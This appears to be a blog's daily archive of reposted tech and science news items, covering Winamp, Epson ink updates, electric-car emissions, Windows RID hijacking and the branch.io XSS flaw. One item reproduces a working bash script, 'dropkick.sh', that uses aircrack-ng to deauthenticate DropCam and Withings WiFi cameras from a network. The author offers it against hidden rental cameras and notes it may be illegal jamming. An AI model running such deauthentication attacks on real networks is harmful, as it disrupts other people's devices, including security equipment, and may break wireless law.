Daily Archives: October 19, 2018

Winamp returns in 2019 to whip the llama’s ass harder than ever

Posted on by

For those who don’t remember: Winamp was the MP3 player of choice around the turn of the century, but went through a rocky period during Aol ownership (our former parent company) and failed to counter the likes of iTunes and the onslaught of streaming services, and more or less crumbled over the years. The original app, last updated in 2013, still works, but to say it’s long in the tooth would be something of an understatement (the community has worked hard to keep it updated, however). So it’s with pleasure that I can confirm rumors that substantial updates are on the way.

“There will be a completely new version next year, with the legacy of Winamp but a more complete listening experience,” said Alexandre Saboundjian, CEO of Radionomy, the company that bought Winamp (or what remained of it) in 2014. “You can listen to the MP3s you may have at home, but also to the cloud, to podcasts, to streaming radio stations, to a playlist you perhaps have built.”

“People want one single experience,” he concluded. “I think Winamp is the perfect player to bring that to everybody. And we want people to have it on every device.”

Laugh if you want but I laugh back

Now, I’m a Winamp user myself. And while I’ve been saddened by the drama through which the iconic MP3 player and the team that created it have gone (at the hands of TechCrunch’s former parent company, Aol), I can’t say I’ve been affected by it in any real way. Winamp 2 and 5 have taken me all the way from Windows 98 SE to 10 with nary a hiccup, and the player is docked just to the right of this browser window as I type this. (I use the nucleo_nlog skin.)

And although I bear the burden of my colleagues’ derisive comments for my choice of player, I’m far from alone. Winamp has as many as a hundred million monthly users, most of whom are outside the U.S. This real, engaged user base could be a powerful foot in the door for a new platform — mobile-first, but with plenty of love for the desktop too.

“Winamp users really are everywhere. It’s a huge number,” said Saboundjian. “We have a really strong and important community. But everybody ‘knows’ that Winamp is dead, that we don’t work on it any more. This is not the case.”

Source: Winamp returns in 2019 to whip the llama’s ass harder than ever | TechCrunch

As a Winamp user myself, I’m really happy, but hope they manage to keep it small and lightweight…

Posted in Art

Alexa heard what you did last summer – and she knows what that was, too: AI recognizes activities from sound

Posted on by

Boffins have devised a way to make eavesdropping smartwatches, computers, mobile devices, and speakers with endearing names like Alexa better aware of what’s going on around them.

In a paper to be presented today at the ACM Symposium on User Interface Software and Technology (UIST) in Berlin, Germany, computer scientists Gierad Laput, Karan Ahuja, Mayank Goel, and Chris Harrison describe a real-time, activity recognition system capable of interpreting collected sound.

In other words, a software that uses devices’ always-on builtin microphones to sense what exactly’s going on in the background.

The researchers, based at Carnegie Mellon University in the US, refer to their project as “Ubicoustics” because of the ubiquity of microphones in modern computing devices.

As they observe in their paper, “Ubicoustics: Plug-and-Play Acoustic Activity Recognition,” real-time sound evaluation to classify activities and and context is an ongoing area of investigation. What CMU’s comp sci types have added is a sophisticated sound-labeling model trained on high-quality sound effects libraries, the sort used in Hollywood entertainment and electronic games.

As good as you and me

Sound-identifying machine-learning models built using these audio effects turn out to be more accurate than those trained on acoustic data mined from the internet, the boffins claim. “Results show that our system can achieve human-level performance, both in terms of recognition accuracy and false positive rejection,” the paper states.

The researchers report accuracy of 80.4 per cent in the wild. So their system misclassifies about one sound in five. While not quite good enough for deployment in people’s homes, it is, the CMU team claims, comparable to a person trying to identify a sound. And its accuracy rate is close to other sound recognition systems such as BodyScope (71.5 per cent) and SoundSense (84 per cent). Ubicoustics, however, recognizes a wider range of activities without site-specific training.

Alexa to the rescue

Alexa, informed by this model, could in theory hear if you left the water running in your kitchen and might, given the appropriate Alexa Skill, take some action in response, like turning off your smart faucet or ordering a boat from Amazon.com to navigate around your flooded home. That is, assuming it didn’t misinterpret the sound in the first place.

The researchers suggest their system could be used, for example, to send a notification when a laundry load finished. Or it might promote public health: By detecting frequent coughs or sneezes, the system “could enable smartwatches to track the onset of symptoms and potentially nudge users towards healthy behaviors, such as washing hands or scheduling a doctor’s appointment.”

Source: Alexa heard what you did last summer – and she knows what that was, too: AI recognizes activities from sound • The Register

Printer Makers Are Crippling Cheap Ink Cartridges Via Bogus ‘Security Updates’ – endangering networks because people stop updating

Posted on by

Printer maker Epson is under fire this month from activist groups after a software update prevented customers from using cheaper, third party ink cartridges. It’s just the latest salvo in a decades-long effort by printer manufacturers to block consumer choice, often by disguising printer downgrades as essential product improvements.

For several decades now printer manufacturers have lured consumers into an arguably-terrible deal: shell out a modest sum for a mediocre printer, then pay an arm and a leg for replacement printer cartridges that cost relatively-little to actually produce.

Unsurprisingly, this resulted in a booming market for discount cartridges and refillable alternatives. Just as unsurprisingly, major printer vendors quickly set about trying to kill this burgeoning market via all manner of lawsuits and dubious behavior.

Initially, companies like Lexmark filed all manner of unsuccessful copyright and patent lawsuits against third-party cartridge makers. When that didn’t work, hardware makers began cooking draconian restrictions into printers, ranging from unnecessary cartridge expiration dates to obnoxious DRM and firmware updates blocking the use of “unofficial” cartridges.

As consumer disgust at this behavior has grown, printer makers have been forced to get more creative in their efforts to block consumer choice.

HP, for example, was widely lambasted back in 2016 when it deployed a “security update” that did little more than block the use of cheaper third-party ink cartridges. HP owners that dutifully installed the update suddenly found their printers wouldn’t work if they’d installed third-party cartridges, forcing them back into the arms of pricier, official HP cartridges.

Massive public backlash forced HP to issue a flimsy mea culpa and reverse course, but the industry doesn’t appear to have learned its lesson quite yet.

The Electronic Frontier Foundation now says that Epson has been engaged in the same behavior. The group says it recently learned that in late 2016 or early 2017, Epson issued a “poison pill” software update that effectively downgraded user printers to block third party cartridges, but disguised the software update as a meaningful improvement.

The EFF has subsequently sent a letter to Texas Attorney General Ken Paxton, arguing that Epson’s lack of transparency can easily be seen as “misleading and deceptive” under Texas consumer protection laws.

“When restricted to Epson’s own cartridges, customers must pay Epson’s higher prices, while losing the added convenience of third party alternatives, such as refillable cartridges and continuous ink supply systems,” the complaint notes. “This artificial restriction of third party ink options also suppresses a competitive ink market and has reportedly caused some manufacturers of refillable cartridges and continuous ink supply systems to exit the market.”

Epson did not immediately return a request for comment.

Activist, author, and EFF member Cory Doctorow tells Motherboard that Epson customers in other states that were burned by the update should contact the organization. That feedback will then be used as the backbone for additional complaints to other state AGs.

“Inkjet printers are the trailblazers of terrible technology business-models, patient zero in an epidemic of insisting that we all arrange our affairs to benefit corporate shareholders, at our own expense,” Doctorow told me via email.

Doctorow notes that not only is this kind of behavior sleazy, it undermines security by eroding consumer faith in the software update process. Especially given that some printers can be easily compromised and used as an attack vector into the rest of the home network.

“By abusing the updating mechanism, Epson is poisoning the security well for all of us: when Epson teaches people not to update their devices, they put us all at risk from botnets,ransomware epidemics, denial of service, cyber-voyeurism and the million horrors of contemporary internet security,” Doctorow said.

“Infosec may be a dumpster-fire, but that doesn’t mean Epson should pour gasoline on it,” he added.

Source: Printer Makers Are Crippling Cheap Ink Cartridges Via Bogus ‘Security Updates’ – Motherboard

Detect and disconnect WiFi cameras in that AirBnB you’re staying in

Posted on by

There have been a few too many stories lately of AirBnB hosts caught spying on their guests with WiFi cameras, using DropCam cameras in particular. Here’s a quick script that will detect two popular brands of WiFi cameras during your stay and disconnect them in turn. It’s based on glasshole.sh. It should do away with the need to rummage around in other people’s stuff, racked with paranoia, looking for the things.

Thanks to Adam Harvey for giving me the push, not to mention for naming it.

For a plug-and-play solution in the form of a network appliance, see Cyborg Unplug.

dropkick.sh

See code comments for more info. You’re welcome.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
 
#!/bin/bash
#
# DROPKICK.SH 
#
# Detect and Disconnect the DropCam and Withings devices some people are using to
# spy on guests in their home, especially in AirBnB rentals. Based on Glasshole.sh:
#
#   http://julianoliver.com/output/log_2014-05-30_20-52 
#
# This script was named by Adam Harvey (http://ahprojects.com), who also
# encouraged me to write it. It requires a GNU/Linux host (laptop, Raspberry Pi,
# etc) and the aircrack-ng suite. I put 'beep' in there for a little audio
# notification. Comment it out if you don't need it.
#
# See also http://plugunplug.net, for a plug-and-play device that does this
# based on OpenWrt. Code here:
#
#   https://github.com/JulianOliver/CyborgUnplug
# 
# Save as dropkick.sh, 'chmod +x dropkick.sh' and exec as follows:
#
#   sudo ./dropkick.sh <WIRELESS NIC> <BSSID OF ACCESS POINT>

shopt -s nocasematch # Set shell to ignore case
shopt -s extglob # For non-interactive shell.

readonly NIC=$1 # Your wireless NIC
readonly BSSID=$2 # Network BSSID (AirBnB WiFi network)
readonly MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }')
# MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not
# present.
readonly GGMAC='@(30:8C:FB*|00:24:E4*)' # Match against DropCam and Withings 
readonly POLL=30 # Check every 30 seconds
readonly LOG=/var/log/dropkick.log

airmon-ng stop mon0 # Pull down any lingering monitor devices
airmon-ng start $NIC # Start a monitor device

while true;
    do  
        for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \
        '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}')
           do
               if [[ "$TARGET" == "$GGMAC" ]]
                   then
                       # Audio alert
                       beep -f 1000 -l 500 -n 200 -r 2
                       echo "WiFi camera discovered: "$TARGET >> $LOG
                       aireplay-ng -0 1 -a $BSSID -c $TARGET mon0 
                       echo "De-authed: "$TARGET " from network: " $BSSID >> $LOG
                       echo '
                             __              __    _     __          __                      
                         ___/ /______  ___  / /__ (_)___/ /_____ ___/ / 
                        / _  / __/ _ \/ _ \/   _// / __/   _/ -_) _  / 
                        \_,_/_/  \___/ .__/_/\_\/_/\__/_/\_\\__/\_,_/  
                                    /_/

                       '                                        
                    else
                        echo $TARGET": is not a DropCam or Withings device. Leaving alone.."
               fi
           done
           echo "None found this round."
           sleep $POLL
done
airmon-ng stop mon0

Disclaimer

For the record, I’m well aware DropCam and Withings are also sold as baby monitors and home security products. The very fact this code exists should challenge you to reconsider the non-sane choice to rely on anything wireless for home security. More so, WiFi jammers – while illegal – are cheap. If you care, use cable.

It may be illegal to use this script in the US. Due to changes in FCC regulation in 2015, it appears intentionally de-authing WiFi clients, even in your own home, is now classed as ‘jamming’. Up until recently, jamming was defined as the indiscriminate addition of noise to signal – still the global technical definition. It’s worth noting here that all wireless routers necessarily ship with the ability to de-auth, as part of the 802.11 specification.

All said, use of this script is at your own risk. Use with caution.

Source: Detect and disconnect WiFi cameras in that AirBnB you’re staying in

The Dirt on Clean Electric Cars

Posted on by

Every major carmaker has plans for electric vehicles to cut greenhouse gas emissions, yet their manufacturers are, by and large, making lithium-ion batteries in places with some of the most polluting grids in the world.

By 2021, capacity will exist to build batteries for more than 10 million cars running on 60 kilowatt-hour packs, according to data of Bloomberg NEF. Most supply will come from places like China, Thailand, Germany and Poland that rely on non-renewable sources like coal for electricity.

Not So Green?

Year 1 includes manufacturing-stage emissions. Predictions based on carbon tailpipe emissions and energy mix in 2017.

Source: Berylls Strategy Advisors

“We’re facing a bow wave of additional CO2 emissions,” said Andreas Radics, a managing partner at Munich-based automotive consultancy Berylls Strategy Advisors, which argues that for now, drivers in Germany or Poland may still be better off with an efficient diesel engine.

The findings, among the more bearish ones around, show that while electric cars are emission-free on the road, they still discharge a lot of the carbon-dioxide that conventional cars do.

Just to build each car battery—weighing upwards of 500 kilograms (1,100 pounds) in size for sport-utility vehicles—would emit up to 74 percent more C02 than producing an efficient conventional car if it’s made in a factory powered by fossil fuels in a place like Germany, according to Berylls’ findings.

[…]

Just switching to renewable energy for manufacturing would slash emissions by 65 percent, according to Transport & Environment. In Norway, where hydro-electric energy powers practically the entire grid, the Berylls study showed electric cars generate nearly 60 percent less CO2 over their lifetime, compared with even the most efficient fuel-powered vehicles.

As it is now, manufacturing an electric car pumps out “significantly” more climate-warming gases than a conventional car, which releases only 20 percent of its lifetime C02 at this stage, according to estimates of Mercedes-Benz’s electric-drive system integration department.

Source: The Dirt on Clean Electric Cars – Bloomberg

Researcher finds simple way of elevating user privileges on Windows PCs and nobody notices for ten months

Posted on by

A security researcher from Colombia has found a way of assigning admin rights and gaining boot persistence on Windows PCs that’s simple to execute and hard to stop –all the features that hackers and malware authors are looking for from an exploitation technique.

What’s more surprising, is that the technique was first detailed way back in December 2017, but despite its numerous benefits and ease of exploitation, it has not received either media coverage nor has it been seen employed in malware campaigns.

Discovered by Sebastián Castro, a security researcher for CSL, the technique targets one of the parameters of Windows user accounts known as the Relative Identifier (RID).

The RID is a code added at the end of account security identifiers (SIDs) that describes that user’s permissions group. There are several RIDs available, but the most common ones are 501 for the standard guest account, and 500 for admin accounts.

rid-hijacking.png
Image: Sebastian Castro

Castro, with help from CSL CEO Pedro García, discovered that by tinkering with registry keys that store information about each Windows account, he could modify the RID associated with a specific account and grant it a different RID, for another account group.

The technique does not allow a hacker to remotely infect a computer unless that computer has been foolishly left exposed on the Internet without a password.

But in cases where a hacker has a foothold on a system –via either malware or by brute-forcing an account with a weak password– the hacker can give admin permissions to a compromised low-level account, and gain a permanent backdoor with full SYSTEM access on a Windows PC.

Since registry keys are also boot persistent, any modifications made to an account’s RID remain permanent, or until fixed.

The attack is also very reliable, being tested and found to be working on Windows versions going from XP to 10 and from Server 2003 to Server 2016, although even older versions should be vulnerable, at least in theory.

“It is not so easy to detect when exploited, because this attack could be deployed by using OS resources without triggering any alert to the victim,” Castro told ZDNet in an interview last week.

“On the other hand, I think is easy to spot when doing forensics operations, but you need to know where to look at.

“It is possible to find out if a computer has been a victim of RID hijacking by looking inside the [Windows] registry and checking for inconsistencies on the SAM [Security Account Manager],” Castro added.

Source: Researcher finds simple way of backdooring Windows PCs and nobody notices for ten months | ZDNet

Pando, One of the world’s largest organisms is shrinking

Posted on by

The Pando aspen grove, located in central Utah, is the largest organism on the planet by weight. From the surface, it may look like a forest that spans more than 100 U.S. football fields, but each tree shares the exact same DNA and is connected to its clonal brethren through an elaborate underground root system. Although not quite as large in terms of area as the massive Armillaria gallica fungus in Michigan, Pando is much heavier, weighing in at more than 6 million kilograms. Now, researchers say, the grove is in danger, being slowly eaten away by mule deer and other herbivores—and putting the fate of its ecosystem in jeopardy.

“This is a really unusual habitat type,” says Luke Painter, an ecologist at Oregon State University in Corvallis who was not involved with the research. “A lot of animals depend on it.”

Aspen forests such as the Pando grove and many others reproduce in two ways. The first is the familiar system in which mature trees drop seeds that grow into new trees. But more commonly, aspen and some other tree species reproduce by sending out sprouts from their roots, which grow up through the soil into entire new trees. The exact amount of time it took the Pando grove to reach its modern extent is unknown, says Paul Rogers, an ecologist at Utah State University in Logan. “However, it’s very likely that it’s centuries old, and it’s just as likely that it’s millennia old.”

Scientists first noticed the Pando shrinking in the late ’90s. They suspected elk, cattle, and most prominently deer were eating the new shoots, so in the new study Rogers and colleagues divided the forest into three experimental groups. One section was completely unfenced, allowing animals to forage freely on the baby aspen. A second section was fenced and left alone. And a third section was fenced and then treated in some places with strategies to spur aspen growth, such as shrub removal and controlled burning; in other places it was left untreated.

Aerial photos of the Pando grove spanning 1939 to 2011, which show the grove thinning over time

USDA Aerial Photography Field Office, Salt Lake City, Utah

The results were surprising: Simply keeping the deer out was enough to allow the grove to successfully recover, the team reports today in PLOS ONE. Even in the fenced-off plots where there was no burning or shrub removal, young trees were thriving.

The good news, at least for Pando, is that it appears that keeping out the deer is enough to solve the problem. But fencing the entirety of the grove is neither practical nor palatable, says Rogers, who partners with the U.S. Forest Service’s Rocky Mountain Research Station in Fort Collins, Colorado, as part of the Western Aspen Alliance, a group committed to improving aspen management and restoring their ecosystems. “Everybody, including myself, doesn’t want fences around this iconic grove. We don’t want to go to nature to see a bunch of fences.”

The alternative, he says, is to do something about the mule deer population. The thinning of the forest has only started to occur in the past century or so. This time frame roughly coincides with when humans entered the area, building cabins, banning hunting, and removing carnivores like wolves that would ordinarily prey on the deer. These human activities, Rogers says, has turned Pando into a safe haven for the deer, artificially inflating their numbers in the area.

With the new data in hand, he’s planning to advocate for a culling of the deer population in the area. Although that may seem extreme, it may be the only chance to give Pando a chance a long-term survival. “The real problem,” Rogers says, “is that there are too many mouths to feed in this area.”

Source: One of the world’s largest organisms is shrinking | Science | AAAS

Twitter releases all foreign election campaign influencing tweets and media for you to study

Posted on by

n line with our principles of transparency and to improve public understanding of alleged foreign influence campaigns, Twitter is making publicly available archives of Tweets and media that we believe resulted from potentially state-backed information operations on our service.

Examples of the content include:

 

While this dataset is of a size that a degree of capability for large dataset analysis is required, we hope to support broad analysis by making a public version of these datasets (with some account-specific information hashed) available. You can download the datasets below. No content has been redacted. Specialist researchers can request access to an unhashed version of these datasets, which will be governed by a data use agreement that will include provisions to ensure the data is used within appropriate legal and ethical parameters.

What’s included?

Our initial disclosures cover two previously disclosed campaigns, and include information from 3,841 accounts believed to be connected to the Russian Internet Research Agency, and 770 accounts believed to originate in Iran. For additional information about this disclosure, see our announcement.

These datasets include all public, nondeleted Tweets and media (e.g., images and videos) from accounts we believe are connected to state-backed information operations. Tweets deleted by these users prior to their suspension (which are not included in these datasets) comprise less than 1% of their overall activity. Note that not all of the accounts we identified as connected to these campaigns actively Tweeted, so the number of accounts represented in the datasets may be less than the total number of accounts listed here.

You can download the datasets below. Note that by downloading these files, you are accepting the Twitter Developer Agreement and Policy.

Internet Research Agency

Iran

NASA and Google using AI to hunt down potentially habitable planets

Posted on by

Astrobiologists are mostly interested in rocky exoplanets that lie in the habitable zone around their parent stars, where liquid water may exist on its surface. NASA’s Kepler spacecraft has spotted a handful of these in the so-called Goldilocks Zone – where it’s not too cold or too hot for life.

As such, a second team from Google and NASA’s lab has built a machine-learning-based tool known as INARA that can identify the chemical compounds in a rocky exoplanet’s atmosphere by studying its high-resolution telescope images.

To develop this software, the brainiacs simulated more than three million planets’ spectral signatures – fingerprints of their atmospheres’ chemical makeups – and labelled them as such to train a convolutional neural network (CNN). The CNN can therefore be used to automatically estimate the chemical composition of a planet from images and light curves of its atmosphere taken from NASA’s Kepler spacecraft. Basically, a neural network was trained to link telescope images to chemical compositions, and thus, you should it a given set of images, and it will spit out the associated chemical components – which can be used to assess whether those would lead to life bursting on the scene.

INARA takes seconds to figure out the biological compounds potentially present in a world’s atmosphere. “Given the scale of the datasets produced by the Kepler telescopes, and the even greater volume of data that will return to Earth from the soon-to-be-launched Transiting Exoplanet Survey Satellite (TESS) satellite, minimizing analysis time per planet can accelerate this research and ensure we don’t miss any viable candidates,” Mascaro concluded. ®

Source: Finally, a use for AI and good old-fashioned simulations: Hunting down E.T. in outer space • The Register

Microplastics found in 90 percent of table salt

Posted on by

Microplastics were found in sea salt several years ago. But how extensively plastic bits are spread throughout the most commonly used seasoning remained unclear. Now, new research shows microplastics in 90 percent of the table salt brands sampled worldwide.

Of 39 salt brands tested, 36 had microplastics in them, according to a new analysis by researchers in South Korea and Greenpeace East Asia. Using prior salt studies, this new effort is the first of its scale to look at the geographical spread of microplastics in table salt and their correlation to where plastic pollution is found in the environment.

“The findings suggest that human ingestion of microplastics via marine products is strongly related to emissions in a given region,” said Seung-Kyu Kim, a marine science professor at Incheon National University in South Korea.

Source: Microplastics found in 90 percent of table salt: potential health impacts?

Wide-eyed glare scares raptors: From laboratory evidence to applied management

Posted on by

Raptors are one of the most important causes of fatalities due to their collisions with aircrafts as well as being the main victims of collisions with constructions. They are difficult to deter because they are not influenced by other airspace users or ground predators. Because vision is the primary sensory mode of many diurnal raptors, we evaluated the reactions of captive raptors to a “superstimulus” (a “paradoxical effect whereby animals show greater responsiveness to an exaggerated stimulus than to the natural stimulus”) that combined an “eye shape” stimulus (as many species have an aversion for this type of stimulus) and a looming movement (LE). This looming stimulus mimics an impending collision and induces avoidance in a wide range of species. In captivity, raptors showed a clear aversion for this LE stimulus. We then tested it in a real life setting: at an airport where raptors are abundant. This study is the first to show the efficiency of a visual non-invasive repellent system developed on the basis of both captive and field studies. This system deterred birds of prey and corvids through aversion, and did not induce habituation. These findings suggest applications for human security as well as bird conservation, and further research on avian visual perception and sensitivity to signals.

Source: Wide-eyed glare scares raptors: From laboratory evidence to applied management

Branch.io bug left ‘685 million’ netizens open to website hacks

Posted on by

Bug-hunters have told how they uncovered a significant security flaw that affected the likes of Tinder, Yelp, Shopify, and Western Union – and potentially hundreds of millions of folks using these sites and apps.

The software sniffers said they first came across the exploitable programming blunder while digging into webpage code on dating websites. After discovering a Tinder.com subdomain – specifically, go.tinder.com – that had a cross-site scripting flaw, they got in touch with the hookup app’s makers to file a bug report.

As it turned out, the vulnerability they discovered went far beyond one subdomain on a site for lonely hearts. The team at VPNMentor said the since-patched security hole had left as many as 685 million netizens vulnerable to cross-site-scripting attacks, during which hackers attempt to steal data and hijack accounts. To pull off one of these scripting attacks, a victim would have to click on a malicious link or open a booby-trapped webpage while logged into a vulnerable service.

That staggering nine-figure number is because the security issue was actually within a toolkit, called branch.io, that tracks website and app users to figure out where they’ve come from, be it Facebook, email links, Twitter, etc. With the bug lurking in branch.io’s code and embedded in a ton of services and mobile applications, the number of people potentially at risk of being hacked via cross-site scripting soared past the half-a-billion mark, we’re told.

Source: Now this might be going out on a limb, but here’s how a branch.io bug left ‘685 million’ netizens open to website hacks • The Register

Star Wars: KOTOR Fan Remake Shutting Down After Cease And Desist From Lucasfilm

Posted on by

Back in 2016, an ambitious group of fans began work on an Unreal Engine 4 “reboot” of role-playing, light-sabering classic Star Wars: Knights of the Old Republic called Apeiron. The project has made impressive progress since then, but it emitted a tragic Wilhelm scream this week when Lucasfilm lawyers zapped it out of existence.

As is often the case with ambitious fan projects, Apeiron received a cease-and-desist letter from lawyers representing the series its team was trying to pay homage to. Apeiron’s developer, Poem Studios, took to Twitter to share the news. “After a few days, I’ve exhausted my options to keep it [Apeiron] afloat; we knew this day was a possibility. I’m sorry and may the force be with you,” Poem wrote alongside a screenshot of a letter purporting to be from Lucasfilm.

“Notwithstanding Poem Studios affection and enthusiasm for the Star Wars franchise and the original KOTOR game, we must object to any unlicensed use of Lucasfilm intellectual property,” reads Lucasfilm’s letter. It goes on to call Apeiron’s use of Star Wars characters, artwork, and images on its website and social media “infringing” and demands that 1) Star Wars materials are removed, 2) the Apeiron team ceases development and destroys its code, and 3) they don’t use any Lucasfilm properties in future games.

Source: Star Wars: KOTOR Fan Remake Shutting Down After Cease And Desist From Lucasfilm

What a bunch of dicks at Lucasfilm.